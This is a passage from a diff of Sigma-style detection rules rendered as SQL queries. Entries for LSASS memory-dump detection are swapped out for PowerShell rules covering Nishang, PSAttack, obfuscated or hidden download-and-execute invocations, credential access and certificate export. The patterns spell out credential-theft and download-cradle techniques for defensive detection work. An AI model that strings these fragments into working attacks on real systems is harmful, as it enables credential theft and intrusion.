ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "proc_access_win_svchost_cred_dump.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "LSASS Memory Access by Tool Named Dump", - "id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Detects a possible process memory dump based on a keyword in the file name of the accessing process", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Rare programs that contain the word dump in their name and access lsass" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE '%dump%' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' 
ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump_indicators.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "LSASS Access from White-Listed Processes", - "id": "4be8b654-0c01-4c9d-a10c-6b28467fc651", - "status": "test", - "description": "Detects a possible process memory dump that uses the white-listed filename like TrolleyExpress.exe as a way to dump the lsass process memory without Microsoft Defender interference", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", + "description": "Detects suspicious PowerShell invocation command parameters", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely, since these tools shouldn't 
access lsass.exe at all" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (SourceImage LIKE '%\\\\TrolleyExpress.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\ProcessDump.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\dump64.exe' ESCAPE '\\') AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' 
ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "proc_access_win_lsass_memdump_evasion.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "LittleCorporal Generated Maldoc Injection", - "id": "7bdde3bf-2a42-4c39-aa31-a92b3e17afac", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", "status": "experimental", - "description": "Detects the process injection of a LittleCorporal generated Maldoc.", - 
"author": "Christian Burkard (Nextron Systems)", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1055.003" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\winword.exe' ESCAPE '\\' AND CallTrace LIKE '%:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v2.%' ESCAPE '\\' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "proc_access_win_littlecorporal_generated_maldoc.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "WerFault Accassing LSASS", - "id": "e5b33f7d-eb93-48b6-9851-09e1e610b6d7", - "status": "test", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Florian Roth (Nextron Systems)", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": 
"91e69562-2426-42ce-a647-711b8152ced6", + "status": "experimental", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.execution", + "attack.reconnaissance", + "attack.discovery", "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.impact" ], "falsepositives": [ - "Actual failures in lsass.exe that trigger a crash dump (unlikely)", - "Unknown cases in which WerFault accesses lsass.exe" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%\\\\WerFault.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "proc_access_win_lsass_werfault.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "Malware Shellcode in Verclsid Target Process", - "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "title": "Powershell Add Name Resolution Policy Table Rule", + "id": "4368354e-1797-463c-bc39-a309effbe8d7", "status": "test", - "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", - "author": "John Lambert (tech), Florian Roth (Nextron Systems)", + "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", + "author": "Borna Talebi", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.impact", + "attack.t1565" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" ], - "filename": "proc_access_win_malware_verclsid_shellcode.yml" + 
"filename": "posh_ps_add_dnsclient_rule.yml" }, { - "title": "LSASS Access from Program in Suspicious Folder", - "id": "fa34b441-961a-42fa-a100-ecc28c886725", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "title": "PowerShell Get-Process LSASS in ScriptBlock", + "id": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "status": "test", + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1003.001" ], "falsepositives": [ - "Legitimate software accessing LSASS process for legitimate reason" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR 
GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\' OR GrantedAccess LIKE '%FF' ESCAPE '\\') AND (SourceImage LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\Temporary%' ESCAPE '\\')) AND NOT ((SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\software\\_reporter\\_tool.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\DropboxUpdate.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebexMTA.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\JetBrains\\\\Toolbox\\\\bin\\\\jetbrains-toolbox.exe' ESCAPE '\\') AND GrantedAccess = '0x410') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent-sc\\\\%' ESCAPE '\\') AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1fffff', '0x1010', '0x101010')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND 
SourceImage LIKE '%\\\\vs\\_bootstrapper\\_%' ESCAPE '\\' AND GrantedAccess = '0x1410') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Temp\\\\%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\GoogleUpdate.exe' ESCAPE '\\' AND GrantedAccess = '0x410') OR ((SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\' AND GrantedAccess = '0x1fffff') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\is-%' ESCAPE '\\' AND SourceImage LIKE '%.tmp\\\\avira\\_system\\_speedup.tmp' ESCAPE '\\' AND GrantedAccess = '0x1410')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-Process lsass%' ESCAPE '\\')" ], - "filename": "proc_access_win_susp_proc_access_lsass_susp_source.yml" + "filename": "posh_ps_susp_getprocess_lsass.yml" }, { - "title": "Mimikatz through Windows Remote Management", - "id": "aa35a627-33fb-4d04-a165-d33b4afca3e8", - "status": "stable", - "description": "Detects usage of mimikatz through WinRM protocol by monitoring access to lsass process by wsmprovhost.exe.", - "author": "Patryk Prauze - ING Tech", + "title": "Malicious PowerShell Keywords", + "id": "f62176f3-8128-4faa-bf6c-83261322e5eb", + "status": "test", + "description": "Detects keywords from well-known PowerShell exploitation frameworks", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", "attack.execution", - "attack.t1003.001", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006", - "attack.s0002" + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND 
(TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wsmprovhost.exe' ESCAPE '\\') AND NOT (GrantedAccess = '0x80000000'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%AdjustTokenPrivileges%' ESCAPE '\\' OR ScriptBlockText LIKE '%IMAGE\\_NT\\_OPTIONAL\\_HDR64\\_MAGIC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Microsoft.Win32.UnsafeNativeMethods%' ESCAPE '\\' OR ScriptBlockText LIKE '%ReadProcessMemory.Invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%SE\\_PRIVILEGE\\_ENABLED%' ESCAPE '\\' OR ScriptBlockText LIKE '%LSA\\_UNICODE\\_STRING%' ESCAPE '\\' OR ScriptBlockText LIKE '%MiniDumpWriteDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%PAGE\\_EXECUTE\\_READ%' ESCAPE '\\' OR ScriptBlockText LIKE '%SECURITY\\_DELEGATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ADJUST\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ALL\\_ACCESS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ASSIGN\\_PRIMARY%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_DUPLICATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_ELEVATION%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_IMPERSONATE%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_INFORMATION\\_CLASS%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_PRIVILEGES%' ESCAPE '\\' OR ScriptBlockText LIKE '%TOKEN\\_QUERY%' ESCAPE '\\' OR ScriptBlockText LIKE '%Metasploit%' ESCAPE '\\' OR ScriptBlockText LIKE '%Mimikatz%' ESCAPE '\\'))" ], - "filename": "proc_access_win_mimikatz_trough_winrm.yml" + "filename": "posh_ps_malicious_keywords.yml" }, { - "title": "Suspicious GrantedAccess Flags on LSASS Access", - "id": "a18dd26b-6450-46de-8c91-9659150cf088", - "status": "experimental", - "description": "Detects process access to LSASS memory with suspicious access flags", + "title": "Suspicious Export-PfxCertificate", + "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", + "status": 
"test", + "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "attack.t1552.004" ], "falsepositives": [ - "Legitimate software such as AV and EDR" + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR 
SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program 